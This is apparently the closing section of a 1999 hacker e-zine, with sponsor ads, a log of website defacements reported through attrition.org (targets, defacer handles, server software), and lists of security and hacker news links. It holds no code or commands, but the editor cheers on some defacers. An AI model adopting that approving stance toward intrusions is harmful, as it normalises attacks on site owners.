~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ _ _ _ /\ | | | | (_) (_) / \ __| |_ _____ _ __| |_ _ ___ _ _ __ __ _ / /\ \ / _` \ \ / / _ \ '__| __| / __| | '_ \ / _` | / ____ \ (_| |\ V / __/ | | |_| \__ \ | | | | (_| | /_/ \_\__,_| \_/ \___|_| \__|_|___/_|_| |_|\__, | __/ | |___/ ADVERTISING IS FREE, SEND IN YOUR ADS TO CRUCIPHUX@DOK.ORG FOR INCLUSION HERE ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * ***************************************************************************** When people ask you "Who is Kevin Mitnick?" do you have an answer? www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE EVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre http://www.2600.com/ http://www.kevinmitnick.com +-----------------------------------------------------------------------------+ | SmoG Alert .. http://smog.cjb.net/ NEWS on SCIENCE | | =================== http://smog.cjb.net/ NEWS on SECURITY | | NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET | | http://smog.cjb.net/ NEWS on TECHNOLOGY | +-----------------------------------------------------------------------------+ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net * * www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net * * http://www.csoft.net" One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // // or cruciphux@dok.org // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Send in submissions for this section please! ............c'mon, you KNOW you wanna...yeah you do...make it fresh and new...be famous... SITE.1 You can Send in submissions for this section too if you've found (or RUN) a cool site... @HWA H.W Hacked websites ~~~~~~~~~~~~~~~~ ___| _ \ | | __| _` |\ \ / | | __| _ \ _` | | | ( | ` < | | | __/ ( | \____|_| \__,_| _/\_\\___/ _| \___|\__,_| Note: The hacked site reports stay, especially wsith some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'... Hacker groups breakdown is available at Attrition.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ check out http://www.attrition.org/mirror/attrition/groups.html to see who you are up against. You can often gather intel from IRC as many of these groups maintain a presence by having a channel with their group name as the channel name, others aren't so obvious but do exist. >Hacked Sites Start<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< * Info supplied by the attrition.org mailing list. Listed oldest to most recent... Defaced domain: sony.com.pa Site Title: Sony (Panama) Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/sony.com.pa Operating System: Windows NT (IIS/4.0) Defaced domain: www.dellnet.com.br Site Title: DellNet Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.dellnet.com.br Defaced by: The Death Knights Operating System: Linux Defaced domain: www.gateway.com.my Site Title: Gateway Malaysia Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.gateway.com.my Defaced by: ieet Operating System: Windows NT Defaced domain: www.honda.com.kw Site Title: Honda Korea Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.honda.com.kw Defaced by: ytcracker Operating System: Linux Defaced domain: www.pcmac.com Site Title: PC Mac Consultants Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.pcmac.com Defaced by: cipher Operating System: Windows NT Defaced domain: homesandloansinc.com Site Title: Homes And Loans Inc. Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/homesandloansinc.com Defaced by: Tranzer Operating System: Windows NT Defaced domain: www.boobshack.com Site Title: Boob Shack Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.boobshack.com Defaced by: naptime Operating System: Linux Previously Hacked Defaced domain: www.whitehousehistory.org Site Title: The White House Historical Association Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.whitehousehistory.org Defaced by: Einstein Operating System: Windows NT Attrition comment: 2nd time hacked Defaced domain: www.faculdadesantamarta.br Site Title: Faculdade Santa Marta Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.faculdadesantamarta.br Defaced by: The Death Knights Operating System: Linux Previously Hacked Defaced domain: sony.com.pa Site Title: Sony Panama Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/sony.com.pa Defaced by: Antichrist Operating System: Windows NT Attrition comment: 2nd time defaced Defaced domain: www.ai-security.com Site Title: AI Security Inc Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.ai-security.com Defaced by: g e n X h a k Operating System: FreeBSD 2.2.1 - 3.0 (Apache 1.2.6) Previously Hacked Defaced domain: www.monicalewinsky.com Site Title: Monica Lewinsky's Web site Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.monicalewinsky.com Defaced by: un1x bowling t34m Operating System: BSDI Attrition comment: 4th time defaced Defaced domain: www.nissan.com.mx Site Title: Nissan Mexico Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.nissan.com.mx Defaced by: ytcracker Operating System: Windows NT Previously Hacked Defaced domain: acquisition.jpl.nasa.gov Site Title: Jet Propulsion Labs NASA Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/acquisition.jpl.nasa.gov Defaced by: JLM Operating System: Windows NT (IIS/4.0) Attrition comment: Previously defaced on 99.10.26 by phreak.nl Defaced domain: www.whataburger.com Site Title: Whataburger Restaurants Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.whataburger.com Defaced by: klept0 Operating System: Linux Defaced domain: www.asesor.com.pe Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.asesor.com.pe Defaced by: xhostile/acidklown Operating System: Windows NT (IIS/4.0) Defaced domain: www.spyconnection.com Site Title: Spy Connection Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.spyconnection.com Defaced by: `defcon Operating System: BSDI Defaced domain: www.wireless.ee Site Title: Phreak.nl Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.wireless.ee Defaced by: Phreak.nl Operating System: Windows 95 Defaced domain: www.oab.org.br Site Title: Ordem dos Advogados do Brasil Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.oab.org.br Defaced by: inferno.br Operating System: Windows NT Defaced domain: www.fabrisia.com Site Title: Fabrisia Cronin Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.fabrisia.com Defaced by: Analognet Operating System: Linux Defaced domain: www.rayee.com Site Title: Rayee Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.rayee.com Defaced by: Analognet Operating System: BSDI Defaced domain: www.streamingcam.com Site Title: Straming Cam Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.streamingcam.com Defaced by: Analognet Operating System: BSDI Defaced domain: www.compunetcgi.com Site Title: Compunet Computer Group Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.compunetcgi.com Defaced by: Evil Entity Operating System: Windows NT (IIS/4.0) Defaced domain: whv1.warnervideo.com Site Title: Warner Home Video Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/whv1.warnervideo.com Defaced by: etC Operating System: Solaris 2.5.x (Netscape-Enterprise/2.0a) Defaced domain: www.dds.be Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.dds.be Defaced by: sacudo69 Operating System: Irix (Rapidsite/Apa-1.3.4) Previously Hacked Defaced domain: www.hg.com.cn Site Title: HG China Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.hg.com.cn Defaced by: kryptek Operating System: Solaris Attrition comment: 2nd time defaced HIDDEN comments in the HTML. Previously Hacked Defaced domain: www.nukleer.gov.tr Site Title: Cekmece Nuclear Research and Training Center Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.nukleer.gov.tr Defaced by: oystr-n-klam Operating System: Linux Attrition comment: 2nd time defaced Defaced domain: www.latino-market.com Site Title: Millennium Computers Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.latino-market.com Defaced by: p4riah Operating System: WIndows NT Defaced domain: bodystore.nu Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/bodystore.nu Defaced by: I.R.C. Operating System: Windows NT (IIS/4.0) Defaced domain: www.investigationresources.com Site Title: Investigative Resources Agency Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.investigationresources.com Defaced by: ytcracker Operating System: Windows NT (IIS/4.0) Attrition comment: mass hack Previously Hacked Defaced domain: www.esdcinc.com Site Title: ESDC Inc Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.esdcinc.com Defaced by: Floghe Operating System: Windows NT Defaced domain: www.thomashosp.com Site Title: Thomas Hosp Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.thomashosp.com Defaced by: w0lf Operating System: Irix Defaced domain: www.lottoteam.de Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.lottoteam.de Defaced by: r00tabega Operating System: Irix (Rapidsite/Apa-1.3.4) Defaced domain: www.familyheartbeat.org Site Title: electr0n Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.familyheartbeat.org Defaced by: electr0n Operating System: BSDI Defaced domain: www.phifersystems.com Site Title: Phifer Systems, Inc. Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.phifersystems.com Defaced by: ytcracker Operating System: Linux Defaced domain: www.barat.edu Site Title: Barat College Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.barat.edu Defaced by: phiber Operating System: Windows NT Defaced domain: west.medicdata.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/west.medicdata.com Defaced by: ytcracker Operating System: Red Hat Linux (Apache 1.3.6) Defaced domain: www.car-4sale.com Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.car-4sale.com Defaced by: ytcracker Operating System: BSDI 3.0 (Apache 1.2.6) Defaced domain: tfcnews.com Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/tfcnews.com Defaced by: Hate Inc Operating System: Windows NT (IIS/4.0) Defaced domain: www.ahcg.com Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.ahcg.com Defaced by: xhostile & acidklown Operating System: MacOS (AppleShareIP/6.0.0) Defaced domain: www.globefilm.com.au Site Title: Globe Film Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.globefilm.com.au Defaced by: xhostile & acidk|own Operating System: Windows NT Defaced domain: www.calcapital.com Site Title: Cal Capital Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.calcapital.com Defaced by: hV2k Operating System: BSDI Defaced domain: stace.commed.ru Site Title: Commed Web Hosting Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/stace.commed.ru Defaced by: ytcracker Operating System: Linux Defaced domain: www.toystory2.net Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.toystory2.net Defaced by: zeroc Operating System: BSDI (Apache 1.3.6) Defaced domain: www.uni-net.co.uk Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.uni-net.co.uk Defaced by: RETURN OF APOCALYPSE Operating System: Solaris 2.6 - 2.7 (Apache 1.2.4) HIDDEN comments in the HTML. Previously Hacked Defaced domain: www.lottoteam.de Site Title: Lotto Team Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/www.lottoteam.de Defaced by: Fuby Operating System: Irox Attrition comment: 2nd time defaced HIDDEN comments in the HTML. Defaced domain: www.m-hip.com Site Title: McDermit Combined Schools Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/www.m-hip.com Defaced by: Fuby Operating System: Windows NT (IIS/4.0) Defaced domain: www.pornography.com Site Title: Atlantis Management Group Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/www.pornography.com Defaced by: Sploit Operating System: Windows NT (IIS/4.0) Previously Hacked Defaced domain: tfcnews.com Site Title: TFC News Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/tfcnews.com Defaced by: p4riah Operating System: Windows NT (IIS/4.0) Attrition comment: Yes, it really was hacked. Defaced domain: unix.webgraphics.com Site Title: Worldwide Web Graphics Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/unix.webgraphics.com Defaced by: Nitr0BurN Operating System: Linux (Apache 1.3.4) Defaced domain: www.ivcsnet.net Site Title: Imperial Valley Computer Service Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/www.ivcsnet.net Defaced by: p4riah Operating System: Windows NT (IIS/4.0) Defaced domain: mars.assiniboinec.mb.ca Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/mars.assiniboinec.mb.ca Defaced by: nitroburn Operating System: Linux (Apache 1.2.6) Defaced domain: radius.preferred.com Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/radius.preferred.com Defaced by: nitroburn Operating System: Linux (Apache 1.3.3) Defaced domain: www.socioambiental.org Site Title: Instituto Socioambiental Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.socioambiental.org Defaced by: c3zar Operating System: Irix (Rapidsite/Apa-1.3.4) Defaced domain: www.optimumsettings.com Site Title: CEO Software, Inc Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.optimumsettings.com Defaced by: wkD Operating System: Linux (Apache/1.3.4) Defaced domain: coldwellbankerj-s.com Site Title: Coldwell Banker Justrom & Stromme Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/coldwellbankerj-s.com Defaced by: DHC Operating System: Linux (Apache 1.2.4) Defaced domain: www.themillcasino.com Site Title: The Mill Casino Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.themillcasino.com Defaced by: DHC Operating System: Linux (Apache 1.2.4) Defaced domain: www.pioneerimplement.com Site Title: Pioneer Implement Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.pioneerimplement.com Defaced by: DHC Operating System: Linux (Apache 1.2.4) Defaced domain: www.schedulerplus.com Site Title: CEO Software Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.schedulerplus.com Defaced by: wkD Operating System: Linux (Apache 1.3.4) Defaced domain: www.votedbest.com Site Title: Irmo News Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.votedbest.com Defaced by: Uneek Operating System: Windows NT (IIS/4.0) Defaced domain: www.indev.nic.in Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.indev.nic.in Defaced by: c0rvus Operating System: Windows NT (IIS/4.0) Defaced domain: beta.intuit.com Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/beta.intuit.com Defaced by: Uneek Technologies Operating System: Windows NT (WebSitePro/1.1h) Defaced domain: www.css.com Site Title: Consult Supply Support Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.css.com Operating System: FreeBSD 2.2.1 - 3.0 Attrition comment: Defacement implies site was RM'd Defaced domain: www.bhv.hn Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.bhv.hn Defaced by: xhostile & acidklown Operating System: Windows NT (IIS/4.0) Defaced domain: www.swoya.com Site Title: Boys & Girls Club of Southwestern Oregon Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.swoya.com Defaced by: DHC Operating System: Linux Defaced domain: www.mtb.gov.br Site Title: Ministerio do Trabalho e do Emprego Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.mtb.gov.br Defaced by: inferno.br Operating System: Windows NT Defaced domain: www.kdcq.com Site Title: K-Dock Oldies 93.5 Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.kdcq.com Defaced by: DHC Operating System: Linux Defaced domain: www.trt6.gov.br Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.trt6.gov.br Defaced by: Einstein Operating System: WinNT Defaced domain: www.memphischamber.com Site Title: Towery Publishing Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.memphischamber.com Defaced by: bansh33 and Analognet Operating System: Irix Previously Hacked Defaced domain: www.salton-maxim.com Site Title: Samantha Dreimann Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.salton-maxim.com Defaced by: p4riah Operating System: WinNT Previously Hacked Defaced domain: www.hwa.net Site Title: Hoefer WYSOCKI Architects Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.hwa.net Defaced by: n4rfy Operating System: WinNT Defaced domain: www.cuztom.com Site Title: Cuztom Incorporated Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.cuztom.com Defaced by: cipher Operating System: WinNT Defaced domain: www.ordsvy.gov.uk Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.ordsvy.gov.uk Defaced by: Sarin Operating System: Windows NT (IIS/4.0) HIDDEN comments in the HTML Defaced domain: www.nctsjax.navy.mil Site Title: Navy Computer and Telecommunications Station, Jacksonvile FLorida Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.nctsjax.navy.mil Defaced by: s01o and k-0s Operating System: Windows NT Defaced domain: aoc.gov Site Title: The Architect of the United States Capitol Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/aoc.gov Defaced by: Verb0 Operating System: Windows NT Defaced domain: cpma.apg.army.mil Site Title: Civilian Personnel Operations Center Management Agency Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/cpma.apg.army.mil Defaced by: s01o and k-0s Operating System: Windows NT Previously Hacked Defaced domain: www.learncomm.org Site Title: Kiel Woodward Associates Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.learncomm.org Defaced by: DHC Operating System: Irix Defaced domain: www.zetcom.ru Site Title: Zetcom Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.zetcom.ru Defaced by: Z0omer Operating System: Windows NT Previously Hacked Defaced domain: www.pietersburg.org.za Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.pietersburg.org.za Defaced by: aKt0r & DajinX Operating System: Windows NT (IIS/4.0) Attrition comment: Previously defaced on 99.09.18 by 139_r00ted - one of 11 .za domains hacked Previously Hacked Defaced domain: www.asesor.com.pe Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.asesor.com.pe Defaced by: bean0 Operating System: Windows NT (IIS/4.0) Attrition comment: Previously defaced on 99.11.29 by acidkl0wn Defaced domain: www.colts.com Site Title: National Football League Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.colts.com Defaced by: Tr1pl3 S31S Operating System: Windows NT (IIS/4.0) Defaced domain: www.isaltda.com.uy Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.isaltda.com.uy Defaced by: m0zy Operating System: Windows NT (Lotus-Domino/Versi˘n-4.6.3a) Defaced domain: www.ta-eng.com Site Title: TA Engineering Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.ta-eng.com Defaced by: himi Operating System: Windows NT (IIS/4.0) and more sites at the attrition cracked web sites mirror: http://www.attrition.org/mirror/attrition/index.html ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ HWA.hax0r.news Mirror Sites around the world: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://datatwirl.intranova.net ** NEW ** http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW ** http://net-security.org/hwahaxornews ** NEW ** http://www.sysbreakers.com/hwa ** NEW ** http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.hackunlimited.com/zine/hwa/ *UPDATED* http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa.*DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwa.hax0r.news.8m.com/ http://www.fortunecity.com/skyscraper/feature/103/ International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://securax.org/cum/ *New address* Brasil........: http://www.psynet.net/ka0z http://www.elementais.cjb.net Canada .......: http://www.hackcanada.com Croatia.......: http://security.monitor.hr Columbia......: http://www.cascabel.8m.com http://www.intrusos.cjb.net Finland ........http://hackunlimited.com/ Germany ........http://www.alldas.de/ http://www.security-news.com/ Indonesia.....: http://www.k-elektronik.org/index2.html http://members.xoom.com/neblonica/ http://hackerlink.or.id/ Netherlands...: http://security.pine.nl/ Russia........: http://www.tsu.ru/~eugene/ Singapore.....: http://www.icepoint.com South Africa ...http://www.hackers.co.za http://www.hack.co.za http://www.posthuman.za.net Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine. .za (South Africa) sites contributed by wyzwun tnx guy... Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]